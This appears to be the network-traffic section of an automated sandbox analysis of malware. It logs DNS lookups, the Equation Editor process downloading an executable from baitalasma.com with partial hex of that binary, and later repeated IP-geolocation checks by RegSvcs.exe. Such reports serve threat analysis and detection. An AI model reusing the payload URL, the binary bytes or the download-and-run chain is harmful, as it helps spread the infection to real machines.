May 4, 2024 10:12:02.544819117 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:02.544819117 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.544819117 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.544819117 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.544819117 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:02.544819117 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:03.584394932 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:03.584394932 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:03.584394932 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:03.584394932 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:03.584394932 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:03.584394932 CEST	8.8.8.8	192.168.2.22	0x27e0	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:06.409584045 CEST	8.8.8.8	192.168.2.22	0x51a2	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:06.409584045 CEST	8.8.8.8	192.168.2.22	0x51a2	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.574315071 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:08.574315071 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.574315071 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.574315071 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.574315071 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.574315071 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.734234095 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:08.734234095 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.734234095 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.734234095 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.734234095 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.734234095 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.893876076 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:08.893876076 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.893876076 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.893876076 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.893876076 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:08.893876076 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.053811073 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:09.053811073 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.053811073 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.053811073 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.053811073 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.053811073 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.213597059 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:09.213597059 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.213597059 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.213597059 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.213597059 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:09.213597059 CEST	8.8.8.8	192.168.2.22	0xfeb2	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.405261993 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:19.405261993 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.405261993 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.405261993 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.405261993 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.405261993 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.565104961 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:19.565104961 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.565104961 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.565104961 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.565104961 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.565104961 CEST	8.8.8.8	192.168.2.22	0xf37b	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.733669043 CEST	8.8.8.8	192.168.2.22	0x65c4	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:19.733669043 CEST	8.8.8.8	192.168.2.22	0x65c4	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.733669043 CEST	8.8.8.8	192.168.2.22	0x65c4	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.733669043 CEST	8.8.8.8	192.168.2.22	0x65c4	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.733669043 CEST	8.8.8.8	192.168.2.22	0x65c4	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:19.733669043 CEST	8.8.8.8	192.168.2.22	0x65c4	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:20.571605921 CEST	8.8.8.8	192.168.2.22	0x52cc	No error (0)	reallyfreegeoip.org		104.21.67.152	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:20.571605921 CEST	8.8.8.8	192.168.2.22	0x52cc	No error (0)	reallyfreegeoip.org		172.67.177.134	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.745874882 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:24.745874882 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.745874882 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.745874882 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.745874882 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.745874882 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.905953884 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:24.905953884 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.905953884 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.905953884 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.905953884 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:24.905953884 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.065807104 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:25.065807104 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.065807104 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.065807104 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.065807104 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.065807104 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.225657940 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:25.225657940 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.225657940 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.225657940 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.225657940 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.225657940 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.385550976 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
May 4, 2024 10:12:25.385550976 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.385550976 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.385550976 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.385550976 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
May 4, 2024 10:12:25.385550976 CEST	8.8.8.8	192.168.2.22	0xf5ca	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

baitalasma.com

reallyfreegeoip.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49163	38.242.255.115	80	1924	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
May 4, 2024 10:09:29.331490993 CEST	317	OUT	GET /T76434567000.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: baitalasma.com Connection: Keep-Alive
May 4, 2024 10:09:29.643255949 CEST	369	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Sat, 04 May 2024 08:09:29 GMT Content-Type: text/html Content-Length: 162 Connection: keep-alive Location: https://baitalasma.com/T76434567000.exe Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.22	49165	158.101.44.242	80	1304	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 4, 2024 10:12:04.278867960 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 4, 2024 10:12:04.461009026 CEST	274	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:04 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>
May 4, 2024 10:12:06.057971001 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 4, 2024 10:12:06.230024099 CEST	274	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:06 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>
May 4, 2024 10:12:07.417736053 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 4, 2024 10:12:07.590217113 CEST	274	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:07 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.22	49168	158.101.44.242	80	2160	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
May 4, 2024 10:12:19.909475088 CEST	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
May 4, 2024 10:12:20.083189011 CEST	274	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:19 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>
May 4, 2024 10:12:20.097779989 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 4, 2024 10:12:20.395169973 CEST	274	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:20 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>
May 4, 2024 10:12:23.640651941 CEST	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
May 4, 2024 10:12:23.832438946 CEST	274	IN	HTTP/1.1 200 OK Date: Sat, 04 May 2024 08:12:23 GMT Content-Type: text/html Content-Length: 105 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 31 2e 31 38 31 2e 35 34 2e 31 30 34 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 81.181.54.104</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.22	49164	38.242.255.115	443	1924	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	Bytes transferred	Direction	Data
2024-05-04 08:09:30 UTC	317	OUT	GET /T76434567000.exe HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Connection: Keep-Alive Host: baitalasma.com
2024-05-04 08:09:31 UTC	339	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 04 May 2024 08:09:30 GMT Content-Type: application/x-msdos-program Content-Length: 1357312 Last-Modified: Fri, 03 May 2024 15:54:50 GMT Connection: close ETag: "663508ca-14b600" Strict-Transport-Security: max-age=15768000; includeSubDomains X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-04 08:09:31 UTC	16045	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z
2024-05-04 08:09:31 UTC	16384	IN	Data Raw: 36 e8 6d c3 01 00 8b 47 04 8b 53 04 8b 0e 8d 04 45 02 00 00 00 50 ff 37 8d 0c 51 51 e8 52 c3 01 00 8b 4b 04 83 c4 18 03 4f 04 8b c6 89 4e 04 5f 5e 5b 5d c2 08 00 55 8b ec b8 30 20 00 00 e8 60 d4 03 00 53 56 8b f1 57 8d 46 14 8b c8 89 45 f0 e8 de 1c 00 00 8b 45 08 83 26 00 c6 46 24 00 66 83 38 21 0f 84 34 f1 03 00 8d 4e 04 50 89 4d 08 e8 35 20 00 00 33 f6 33 c0 33 ff 89 75 f8 8b 75 08 32 db 89 45 f4 32 ff 57 8b ce e8 30 01 00 00 6a 20 59 0f b7 00 66 3b c1 0f 84 0a f1 03 00 6a 09 59 66 3b c1 0f 84 fe f0 03 00 8b 75 f8 8b 4d 08 57 e8 09 01 00 00 47 0f b7 00 66 85 c0 0f 84 b8 00 00 00 81 fe 00 10 00 00 0f 8d ac 00 00 00 6a 20 59 66 3b c1 74 3c 6a 09 59 66 3b c1 74 34 6a 22 59 66 3b c1 74 0b 66 89 84 75 d4 df ff ff 46 eb bb 8b 4d 08 57 e8 c4 00 00 00 6a 22 59 Data Ascii: 6mGSEP7QQRKON_^[]U0 `SVWFEE&F$f8!4NPM5 333uu2E2W0j Yf;jYf;uMWGfj Yf;t<jYf;t4j"Yf;tfuFMWj"Y
